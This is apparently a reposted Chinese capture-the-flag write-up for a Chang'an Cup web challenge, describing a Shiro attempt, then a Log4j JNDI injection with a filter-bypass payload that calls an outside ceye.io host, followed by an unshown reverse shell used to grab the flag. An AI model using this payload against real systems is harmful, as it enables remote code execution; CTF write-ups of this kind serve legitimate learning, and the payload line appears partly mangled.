[长安杯]web-shiro复现
Posted TzZzEZ-web
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[长安杯]web-shiro复现相关的知识,希望对你有一定的参考价值。
长安杯-shiro?复现
浏览器显示是springboot框架
登录伪造shiro,关键词为remeber-me
shiro直接打,打不进去
springboot还可以写log4j漏洞,测试一下
jndi被过滤了
进行绕过
$$::-jndi:rmi://py2hu7.ceye.io/exp
成功接收到dnslog信息。
构建jndi反弹shell,这里反弹shell的命令需要bypass一下
在这里插入代码片
反弹的有点慢,但是可以成功反弹shell并拿取flag。
以上是关于[长安杯]web-shiro复现的主要内容,如果未能解决你的问题,请参考以下文章